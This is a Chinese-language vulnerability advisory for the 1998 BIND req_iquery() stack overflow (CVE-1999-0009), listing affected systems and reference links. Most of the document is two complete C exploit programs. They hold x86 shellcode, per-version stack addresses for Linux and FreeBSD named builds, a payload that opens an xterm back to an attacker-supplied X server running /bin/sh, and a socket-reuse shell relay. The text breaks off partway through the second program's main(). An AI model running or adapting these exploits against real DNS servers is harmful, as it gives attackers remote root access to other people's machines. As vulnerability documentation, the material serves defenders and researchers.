多家厂商BIND iquery远程缓冲区溢出漏洞

发布日期:1998-04-08
更新日期:1998-04-08

受影响系统:
Multiple Vendor BIND
    - BSDI BSD/OS 2.1
    - BSDI BSD/OS 2.0.1
    - BSDI BSD/OS 2.0
    - Caldera OpenLinux Standard 1.0
    - DG/UX 5.4 4.11
    - DG/UX 5.4 4.1
    - DG/UX 5.4 3.1
    - DG/UX 5.4 3.0
    - IBM AIX 4.3
    - IBM AIX 4.2.1
    - IBM AIX 4.2
    - IBM AIX 4.1.5
    - IBM AIX 4.1.4
    - IBM AIX 4.1.3
    - IBM AIX 4.1.2
    - IBM AIX 4.1.1
    - IBM AIX 4.1
    - NetBSD 1.3.1
    - NetBSD 1.3
    - NetBSD 1.2.1
    - NetBSD 1.2
    - NetBSD 1.1
    - NetBSD 1.0
    - RedHat Linux 5.1
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SGI IRIX 6.3
    - SGI IRIX 6.2
    - SGI IRIX 6.1
    - SGI IRIX 6.0.1XFS
    - SGI IRIX 6.0.1
    - SGI IRIX 6.0
    - SGI IRIX 5.3XFS
    - SGI IRIX 5.3
    - SGI IRIX 5.2
    - SGI IRIX 5.1.1
    - SGI IRIX 5.1
    - SGI IRIX 5.0.1
    - SGI IRIX 5.0
    - SGI IRIX 4.0.5IPR
    - SGI IRIX 4.0.5H
    - SGI IRIX 4.0.5G
    - SGI IRIX 4.0.5F
    - SGI IRIX 4.0.5E
    - SGI IRIX 4.0.5D
    - SGI IRIX 4.0.5A
    - SGI IRIX 4.0.5(IOP)
    - SGI IRIX 4.0.5
    - SGI IRIX 4.0.4T
    - SGI IRIX 4.0.4B
    - SGI IRIX 4.0.4
    - SGI IRIX 4.0.3
    - SGI IRIX 4.0.2
    - SGI IRIX 4.0.1T
    - SGI IRIX 4.0.1
    - SGI IRIX 4.0
    - SGI IRIX 3.3.3
    - SGI IRIX 3.3.2
    - SGI IRIX 3.3.1
    - SGI IRIX 3.3
    - SGI IRIX 3.2
    - Sun Solaris 2.6 x86
    - Sun Solaris 2.5.1 SPARC
    - Sun Solaris 2.5.1
    - Sun Solaris 2.5.1 x86
    - Sun Solaris 2.5
    - Sun Solaris 2.5 x86
    - Sun Solaris 2.4
    - Sun Solaris 2.3
不受影响系统:
Multiple Vendor BIND
    - BSDI BSD/OS 4.0
Multiple Vendor BIND
    - BSDI BSD/OS 3.0
Multiple Vendor BIND
    - Caldera OpenLinux Standard 1.2
Multiple Vendor BIND
    - Caldera OpenLinux Standard 1.1
Multiple Vendor BIND
    - FreeBSD 3.3
Multiple Vendor BIND
    - NetBSD 1.4 x86
Multiple Vendor BIND
    - NetBSD 1.3.3
Multiple Vendor BIND
    - NetBSD 1.3.2
Multiple Vendor BIND
    - RedHat Linux 5.2 x86
Multiple Vendor BIND
    - RedHat Linux 5.1
Multiple Vendor BIND
    - SGI IRIX 6.5
Multiple Vendor BIND
    - SGI IRIX 6.4
描述:
BUGTRAQ  ID: 134
CVE(CAN) ID: CVE-1999-0009

BIND是一种被广泛应用的DNS服务器程序,由Internet Software Consortium开发维护。

低于4.9.7和8.1.2的BIND版本中在处理反向查询时存在一个严重的缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上以root用户的权限执行任意指令。

当req_iquery()函数在处理一个反向域名解析请求时,如果用户提供超长的数据,将导致发生堆栈溢出,远程攻击者可能通过溢出攻击获取主机的root用户权限。这个漏洞影响所有使用有问题BIND版本的系统,而且已经有很多攻击程序流传开来。

<*链接:http://www.cert.org/advisories/CA-1998-05.html
        ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
        ftp://patches.sgi.com/support/free/security/advisories/19980603-02-PX
        ftp://ftp.auscert.org.au/pub/auscert/ESB/ESB-98.137
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba
*>

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

prym 提供了如下测试程序:

/*
* z, thnx.
* ganked the xterm exec from adm, thnx.
* have fun.
* -prym
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define REMOTE                 /* selects the xterm-callback payload branch in attack(); undefine for the local payload */
#define DEFAULT_ANBUF_OFFSET 300  /* default for the optional [offset] argument, added to the table address */
#define DEFAULT_TARGET 0          /* default index into target[] */
#define DEFAULT_OPTIMIZED 0       /* default for the optional [opt] argument */
#define DLEN_VAL 4                /* stored at rdata offset dlen-12 in the non-optimized layout */
/* Bytes of the answer RR that precede its rdata: 1 (empty name) + type, class,
 * rdlength (three shorts) + ttl (long); mirrors the PUTSHORT/PUTLONG sequence
 * in attack().  NOTE(review): PUTLONG always writes 4 bytes, so this only
 * matches the wire layout on a build where sizeof(long) == 4. */
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)  /* stored at rdata offset dlen-16 in the non-optimized layout */
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN) /* filler + payload bytes written at the start of the rdata */
/* rdlength values (minus the trailing 4) for the normal and "optimized" named
 * builds; PACKETSZ and MAXDNAME come from <arpa/nameser.h>, so the declared
 * rdlength is far larger than one PACKETSZ buffer. */
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)

/* One row of the target table used by main() and attack().  A zero address
 * means that build variant is not available for the entry; main() switches
 * the optimized flag to whichever address is nonzero. */
struct target_type
{
  char desc[40];            /* label printed in the usage listing and before the send */
  int systype;              /* payload selector; attack() only handles 0 and returns 0 otherwise */
  unsigned long addr;       /* "anbuf" address for the normal named build, 0 if unknown */
  unsigned long opt_addr;   /* "anbuf" address for the optimized named build, 0 if unknown */
};

/* Target table; terminated by an all-zero entry, which main() detects by
 * desc[0] == 0 when counting the usable rows. */
struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
  {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
  {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
  {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
  {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},  /* no normal-build address: optimized only */
  {{0},0,0,0}
};

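/*
 * Resolve a dotted-quad literal or a host name to an IPv4 address.
 *
 * host: NUL-terminated address literal or host name.
 * Returns the address in network byte order, widened to unsigned long
 * (the same value inet_addr() yields for a literal), or 0 when neither
 * inet_addr() nor gethostbyname() accepts the input.
 *
 * The original stored the in_addr_t result in a long and tested it with
 * "< 0"; that only detects INADDR_NONE when long is 32 bits wide, so the
 * lookup fallback never ran on 64-bit builds.  It also read h_addr through
 * an unsigned long pointer, an over-read of the 4-byte address on 64-bit
 * builds and an aliasing violation on any build.  Compare against
 * INADDR_NONE and copy the address bytes with memcpy instead.
 */
unsigned long resolve(char *host)
{
  in_addr_t a = inet_addr(host);
  struct hostent *he;
  struct in_addr in;

  if(a!=INADDR_NONE)
    return((unsigned long)a);

  if((he=gethostbyname(host))==NULL)
    return(0);

  /* Only accept a well-formed IPv4 answer; anything else counts as failure. */
  if(he->h_addrtype!=AF_INET || he->h_length!=(int)sizeof(in)
     || he->h_addr_list==NULL || he->h_addr_list[0]==NULL)
    return(0);

  memcpy(&in,he->h_addr_list[0],sizeof(in));
  return((unsigned long)in.s_addr);
}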

/*
 * Write one TCP-framed DNS message to fd: a two-byte big-endian length
 * prefix followed by len bytes of buff.
 *
 * Returns 1 when both write() calls transferred exactly the requested
 * byte count, -1 otherwise.  Only the low 16 bits of len fit the prefix;
 * a short write is reported as failure rather than retried.
 */
int send_packet(int fd, char *buff, int len)
{
  unsigned char hdr[2];
  unsigned short n16 = (unsigned short)len;

  hdr[0] = (unsigned char)(n16 >> 8);
  hdr[1] = (unsigned char)(n16 & 0xff);

  if(write(fd,hdr,2)!=2)
    return(-1);
  if(write(fd,buff,len)!=len)
    return(-1);
  return(1);
}

/*
 * Build and send one IQUERY message whose single answer record declares an
 * rdlength far larger than PACKETSZ -- the req_iquery() overflow described
 * in the advisory above.
 *
 * fd         connected TCP socket; the message goes out through send_packet()
 * us         local address, formatted into the payload as the xterm display
 * t          target table entry (payload variant and addresses)
 * offset     added to the chosen address
 * optimized  nonzero selects t.opt_addr and OPT_RET_FROM_1NOP, zero selects
 *            t.addr and RET_FROM_1NOP
 *
 * Returns send_packet()'s result (1 sent, -1 write error), or 0 when
 * t.systype is not 0, the only variant this program knows.
 *
 * NOTE(review): the layout assumes a 32-bit build -- the address is copied
 * with sizeof(unsigned long) and PRE_OF_DATALEN counts sizeof(long) for a
 * ttl that PUTLONG writes as 4 bytes.
 */
int attack(int fd, struct in_addr us, struct target_type t,
       unsigned long offset, int optimized)
{
  char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;

  /* DNS header: opcode IQUERY with one answer record and no question. */
  memset(dnsh,0,sizeof(HEADER));
  dnsh->id = htons(31337);
  dnsh->opcode = IQUERY;
  dnsh->rd = 1;
  dnsh->ra = 1;
  dnsh->ancount = htons(1);
  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  /* Answer RR: empty (root) name, type A, class IN, ttl, then the oversized
   * rdlength.  PRE_OF_DATALEN is the byte count of these fields. */
  *ptr = '\0';
  ptr++;
  PUTSHORT(T_A,ptr);
  PUTSHORT(C_IN,ptr);
  PUTLONG(31337,ptr);
  dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
  PUTSHORT(dlen,ptr);
  len += PRE_OF_DATALEN;

  /* Pre-fill everything after the RR fields; the rdata is laid out on top. */
  memset(ptr,'X',(sizeof(buff)-(ptr-buff)));

  if(t.systype==0)
    {
#ifdef REMOTE
      /* Payload fragments: c1 and c4 are fixed, c2 names the xterm binary
       * and its -display switch, c3 is built from the local address.
       * c1[4] and c4[2] are length-dependent bytes recomputed from
       * strlen(c2)+strlen(c3). */
      char c1[] =
    "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
    "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
    "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
    "\x80\xe8\xcc\xff\xff\xff";
      char c2[] =
    "/usr/bin/X11/xterm\xff-display\xff";
      char c3[32];
      char c4[] =
    "\xfe\xe8\xb1\xff\xff\xff";

      /* inet_ntoa() yields at most 15 characters, so this fits c3. */
      snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));

      c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
      c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);

      /* Filler first, so the four fragments end exactly EVILSPACE bytes
       * into the rdata. */
      i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c1,strlen(c1));
      memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
      memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
      memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
      /* Local variant.  This int i shadows the outer unsigned long i. */
      char c0de[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
      int i = EVILSPACE-strlen(c0de);

      memset(ptr,0x90,i);
      memcpy((ptr+i),c0de,strlen(c0de));
#endif
    }
  else
    return(0);  /* unsupported systype; main() reports "internal error" */

  /* The non-optimized layout additionally stores ALEN_VAL and DLEN_VAL at
   * rdata offsets dlen-16 and dlen-12 (copied as host-order ints). */
  if(!optimized)
    {
      memcpy((ptr+(dlen-16)),&al,sizeof(al));
      memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
    }

  /* Chosen table address plus offset, stored at rdata offset dlen-4
   * (copied as a host-order unsigned long). */
  i = (optimized?t.opt_addr:t.addr)+offset;
  memcpy((ptr+(dlen-4)),&i,sizeof(i));
  len += dlen;

  return(send_packet(fd,buff,len));
}

/*
 * Entry point: parse argv, connect to the target's port 53/tcp, print the
 * chosen parameters and hand off to attack().
 *
 * usage: <target> <X server> [tt] [opt] [offset]
 *   target    host whose named is contacted
 *   X server  address attack() formats into the payload as the display
 *   tt        index into target[]; default DEFAULT_TARGET
 *   opt       0 or 1; default DEFAULT_OPTIMIZED, flipped automatically when
 *             the table row lacks an address for the requested variant
 *   offset    added to the table address; default DEFAULT_ANBUF_OFFSET
 *
 * Exits with -1 on any usage, resolution or socket error and 0 after a
 * completed send.
 *
 * NOTE(review): the numeric arguments go through atoi() unchecked.  Only the
 * upper bound of tt is tested, so a negative tt indexes before target[]; a
 * negative offset wraps when stored in the unsigned long.
 */
int main(int argc, char *argv[])
{
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  struct sockaddr_in sa;   /* only family, port and address are set; sin_zero stays uninitialized */
  struct in_addr xs;

  /* i = number of usable rows; the table ends with an entry whose desc[0] is 0. */
  for(i=0;target[i].desc[0];i++);

  if(argc<3)
    {
      fprintf(stderr,"\ntarget types:\n");
      fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
          "description");
      for(target_index=0;target_index<i;target_index++)
    fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
        (unsigned int)target[target_index].addr,
        (unsigned int)target[target_index].opt_addr,
        target[target_index].desc);
      fprintf(stderr,
          "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
          argv[0]);
      exit(-1);
    }

  /* Upper bound only; see the note above about negative values. */
  if((argc>3)&&((target_index=atoi(argv[3]))>=i))
    {
      fprintf(stderr,"error: invalid target type %d\n",target_index);
      exit(-1);
    }

  /* A row with neither address cannot be used at all. */
  if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
    {
      fprintf(stderr,"error: internal error\n");
      exit(-1);
    }

  if(argc>4)
    {
      optimized = atoi(argv[4]);
      if((optimized!=0)&&(optimized!=1))
    {
      fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
      exit(-1);
    }
    }

  /* Fall back to whichever variant the row actually has an address for. */
  if((optimized==0)&&(target[target_index].addr==0))
    optimized = 1;

  if((optimized==1)&&(target[target_index].opt_addr==0))
    optimized = 0;

  if(argc>5)
    offset = atoi(argv[5]);

  /* Resolve the X server first (argv[2]), then the target (argv[1]);
   * resolve() returns 0 on failure. */
  if(!(xs.s_addr=resolve(argv[2])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
      exit(-1);
    }

  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
    {
      perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      perror("error: connect");
      exit(-1);
    }

  printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  printf("target type        : %s\n",target[target_index].desc);
  printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  printf("anbuff addr        : 0x%x\n",(unsigned int)
     (optimized?target[target_index].opt_addr:target[target_index].addr));
  printf("anbuff addr offset : %lu\n",offset);
  printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  printf("exploiting . . .\n");

  /* attack() returns -1 on a write error, 0 for an unsupported systype,
   * 1 after the send; the break statements after return are unreachable. */
  switch(attack(sock,xs,target[target_index],offset,optimized))
    {
    case -1:
      perror("error: attack");
      return(-1);
      break;

    case 0:
      fprintf(stderr,"error: internal error\n");
      return(-1);
      break;
    }

  if(close(sock)!=0)
    {
      perror("error: close");
      return(-1);
    }

  exit(0);
}
ROTShB 提供了如下测试程序:

/*
* have fun.
* -ROTShB
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define DEFAULT_TARGET       0      /* default index into target[] */
#define DEFAULT_OPTIMIZATION 0      /* default for the optional [opt] argument */
#define DEFAULT_ANBUF_OFFSET 300    /* default for the optional [ofst] argument, added to the table address */
#define DLEN_VAL             4      /* stored at rdata offset dlen-12 in the non-optimized layout */
/* Local copies of the PACKETSZ / MAXDNAME values from <arpa/nameser.h>,
 * used in the same rdlength formula as the first program. */
#define NPACKETSZ            512
#define NMAXDNAME            1025
/* Bytes of the answer RR that precede its rdata: 1 (empty name) + type, class,
 * rdlength (three shorts) + ttl (long); mirrors the PUTSHORT/PUTLONG sequence
 * in attack().  NOTE(review): PUTLONG always writes 4 bytes, so this only
 * matches the wire layout where sizeof(long) == 4. */
#define PRE_EGG_DATALEN      (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL             (DLEN_VAL+PRE_EGG_DATALEN)  /* stored at rdata offset dlen-16 in the non-optimized layout */
#define BUFFSIZE             4096   /* attack()'s message buffer; header + RR + the largest dlen fit with room to spare */

/* One row of the target table used by main() and attack().  systype picks
 * the payload branch in attack() (0 and 1 are handled); fd is the descriptor
 * number attack() patches into the payload and main() prints as
 * "fd to make dups of". */
struct target_type
{
  char          desc[40];   /* label printed in the usage listing and before the send */
  int           systype;    /* payload selector: 0 or 1, anything else makes attack() return 0 */
  unsigned long addr;       /* "anbuf" address for the normal named build */
  unsigned long opt_addr;   /* "anbuf" address for the optimized named build */
  int           fd;         /* descriptor number written into the payload */
};

/* Target table; "(se)" / "(le)" are two build variants of the same named
 * version.  Terminated by an all-zero entry, which main() detects by both
 * addresses being 0 when counting the usable rows. */
struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-REL (se)",0,0xbffff21c,0xbffff23c,4},
  {"x86 Linux 2.0.x named 4.9.5-REL (le)",0,0xbfffeedc,0xbfffeefc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (se)",0,0xbffff294,0xbffff2cc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (le)",0,0xbfffef8c,0xbfffefb4,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (se)",0,0xbffff3e3,0xbffff403,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (le)",0,0xbffff188,0xbffff194,4},
  {"x86 Linux 2.0.x named 8.1-REL (se)",0,0xbffff6a4,0xbffff6f8,5},
  {"x86 Linux 2.0.x named 8.1-REL (le)",0,0xbffff364,0xbffff3b8,5},
  {"x86 Linux 2.0.x named 8.1.1 (se)",0,0xbffff6b8,0xbffff708,5},
  {"x86 Linux 2.0.x named 8.1.1 (le)",0,0xbffff378,0xbffff3c8,5},
  {"x86 FreeBSD 3.x named 4.9.5-REL (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-REL (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (se)",1,0xefbfd480,0xefbfd4e8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (le)",1,0xefbfd218,0xefbfd274,4},
  {{0},0,0,0,0}
};

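/*
 * Resolve a dotted-quad literal or a host name to an IPv4 address.
 *
 * host: NUL-terminated address literal or host name.
 * Returns the address in network byte order, widened to unsigned long
 * (the same value inet_addr() yields for a literal), or 0 when neither
 * inet_addr() nor gethostbyname() accepts the input.
 *
 * The original stored the in_addr_t result in a long and compared it with
 * -1; that only matches INADDR_NONE when long is 32 bits wide, so the
 * lookup fallback never ran on 64-bit builds.  It also read h_addr through
 * an unsigned long pointer, an over-read of the 4-byte address on 64-bit
 * builds and an aliasing violation on any build.  Compare against
 * INADDR_NONE and copy the address bytes with memcpy instead.
 */
unsigned long resolve(char *host)
{
  in_addr_t a = inet_addr(host);
  struct hostent *he;
  struct in_addr in;

  if(a!=INADDR_NONE)
    return((unsigned long)a);

  if((he=gethostbyname(host))==NULL)
    return(0);

  /* Only accept a well-formed IPv4 answer; anything else counts as failure. */
  if(he->h_addrtype!=AF_INET || he->h_length!=(int)sizeof(in)
     || he->h_addr_list==NULL || he->h_addr_list[0]==NULL)
    return(0);

  memcpy(&in,he->h_addr_list[0],sizeof(in));
  return((unsigned long)in.s_addr);
}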

/*
 * Send buff over fd with the two-byte big-endian length prefix that DNS
 * over TCP requires.
 *
 * Returns 1 if both write() calls transferred exactly what was asked,
 * otherwise -1.  Only the low 16 bits of len reach the prefix; a short
 * write is reported as failure, not retried.
 */
int send_packet(int fd, char *buff, int len)
{
  unsigned wire = (unsigned)len & 0xffffu;
  unsigned char prefix[2] = { (unsigned char)(wire >> 8), (unsigned char)wire };

  if(write(fd,prefix,sizeof(prefix))!=2)
    return(-1);

  return((write(fd,buff,len)==len) ? 1 : -1);
}

/*
 * Build and send one IQUERY message whose single answer record declares an
 * rdlength far larger than NPACKETSZ -- the req_iquery() overflow described
 * in the advisory above.
 *
 * fd         connected TCP socket; the message goes out through send_packet()
 * t          target table entry (payload variant, addresses, fd number)
 * offset     added to the chosen address
 * optimized  nonzero selects t.opt_addr and the shorter rdlength, zero
 *            selects t.addr and the longer one
 *
 * Returns send_packet()'s result (1 sent, -1 write error), or 0 when
 * t.systype is neither 0 nor 1.
 *
 * NOTE(review): the layout assumes a 32-bit build -- values are copied with
 * sizeof(unsigned long) and PRE_EGG_DATALEN counts sizeof(long) for a ttl
 * that PUTLONG writes as 4 bytes.
 */
int attack(int fd, struct target_type t, unsigned long offset, int optimized)
{
  char buff[BUFFSIZE], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0;

  /* DNS header: opcode IQUERY with one answer record and no question. */
  (void)memset(dnsh,0,sizeof(HEADER));

  dnsh->id      = htons(31337);
  dnsh->opcode  = IQUERY;
  dnsh->rd      = 1;
  dnsh->ra      = 1;
  dnsh->ancount = htons(1);

  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  /* Answer RR: empty (root) name, type A, class IN, ttl; the rdlength is
   * written inside the systype branches. */
  *ptr = '\0';
  ptr++;

  i = T_A;
  PUTSHORT(i,ptr);

  i = C_IN;
  PUTSHORT(i,ptr);

  i = 31337;
  PUTLONG(i,ptr);

  if(t.systype==0)
    {
      /* Linux payload ("/bin/sh"); c0de[7] is patched with t.fd below. */
      char c0de[] =
        "\x31\xc0\xb0\x3f\x31\xdb\xb3\xff\x31\xc9\xcd\x80\x31\xc0\xb0\x3f\xb1"
        "\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd\x80\xeb\x24\x5e\x8d\x1e\x89"
        "\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10"
        "\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
        "\xff\xff\xff/bin/sh";

      /* rdlength for the optimized / normal named layouts. */
      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      /* Descriptor number from the table (main() prints it as
       * "fd to make dups of"); int narrowed to char. */
      c0de[7] = t.fd;

      /* Fill the rest of the buffer with 0x90, then place the payload
       * (sizeof, i.e. including its NUL) so it ends NPACKETSZ bytes into
       * the RR.  The non-optimized layout repeats it before the dlen-16
       * slot and stores ALEN_VAL / DLEN_VAL at dlen-16 / dlen-12; the
       * optimized layout repeats it before the dlen-4 slot. */
      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      /* Table address plus offset for the selected variant. */
      i = (optimized?t.opt_addr:t.addr)+offset;

      len += dlen;
    }


  else if(t.systype==1)
    {
      /* FreeBSD payload; c0de[22] is patched with t.fd below. */
      char c0de[] =
        "\xeb\x6e\x5e\xc6\x06\x9a\x31\xc9\x89\x4e\x01\xc6\x46\x05\x07\x88"
        "\x4e\x06\x51\x31\xdb\xb3\x04\x53\x66\xc7\x46\x07\xeb\xa7\x31\xc0"
        "\xb0\x5a\x50\xeb\x50\xfe\xc1\x51\x53\xc6\x46\x08\xb6\x31\xc0\xb0"
        "\x5a\x50\xeb\x41\xfe\xc1\x51\x53\xc6\x46\x08\xc5\x31\xc0\xb0\x5a"
        "\x50\xeb\x32\xc7\x46\x07\x2f\x62\x69\x6e\xc7\x46\x0b\x2f\x73\x68"
        "\x21\x31\xc0\x88\x46\x0e\x8d\x5e\x07\x89\x5e\x0f\x89\x46\x13\x8d"
        "\x5e\x13\x53\x8d\x5e\x0f\x53\x8d\x5e\x07\x53\xb0\x3b\x50\xeb\x05"
        "\xe8\x8d\xff\xff\xff";

      /* Same rdlength formulas as the systype==0 branch. */
      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[22] = t.fd;

      /* Same fill-and-place sequence as the systype==0 branch. */
      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      /* Table address plus offset, stored at rdata offset dlen-4
       * (copied as a host-order unsigned long). */
      i = (optimized?t.opt_addr:t.addr)+offset;
      (void)memcpy((ptr+(dlen-4)),&i,sizeof(i));

      len += dlen;
    }
  else
    return(0);  /* unsupported systype; main() reports "internal error" */

  return(send_packet(fd,buff,len));
}

/*
 * Entry point: parse argv, connect to the target's port 53/tcp, print the
 * chosen parameters, call attack(), then relay stdin/stdout over the same
 * socket until either side closes.
 *
 * usage: <host> [tt] [opt] [ofst]
 *   host  target whose named is contacted
 *   tt    index into target[]; default DEFAULT_TARGET
 *   opt   0 or 1; default DEFAULT_OPTIMIZATION
 *   ofst  added to the table address; default DEFAULT_ANBUF_OFFSET
 *
 * Exits with -1 on any usage, resolution, socket or relay error and 0 once
 * the relay loop ends and the socket is closed.
 *
 * NOTE(review): the numeric arguments go through atoi() unchecked, and the
 * tt bound test is off by one -- ti == i passes it and selects the all-zero
 * terminator row.  A negative ofst wraps when stored in the unsigned long.
 */
int main(int argc, char *argv[])
{
  char xbuf[128], ybuf[128];   /* xbuf: stdin -> socket, ybuf: socket -> stdout */
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int ti, opt=DEFAULT_OPTIMIZATION, sock, i;
  int xlen=0, ylen=0;          /* bytes currently buffered in xbuf / ybuf */
  fd_set rd, wr;
  struct sockaddr_in sa;       /* only family, port and address are set; sin_zero stays uninitialized */

  /* i = number of usable rows; the table ends with a row whose addresses are both 0. */
  for(i=0;((target[i].addr)||(target[i].opt_addr));i++);

  if(argc<2)
    {
      (void)fprintf(stderr,"\ntarget types:\n");

      for(ti=0;ti<i;ti++)
        (void)fprintf(stderr," %-2d : %s\n",ti,target[ti].desc);

      (void)fprintf(stderr,"\nerror: usage: %s <host> [tt] [opt] [ofst]\n",
                    argv[0]);
      exit(-1);
    }

  if(argc>2)
    {
      ti = atoi(argv[2]);
      /* Should be ti>=i; see the note above. */
      if((ti<0)||(ti>i))
        {
          (void)fprintf(stderr,"error: invalid target type %d\n",ti);
          exit(-1);
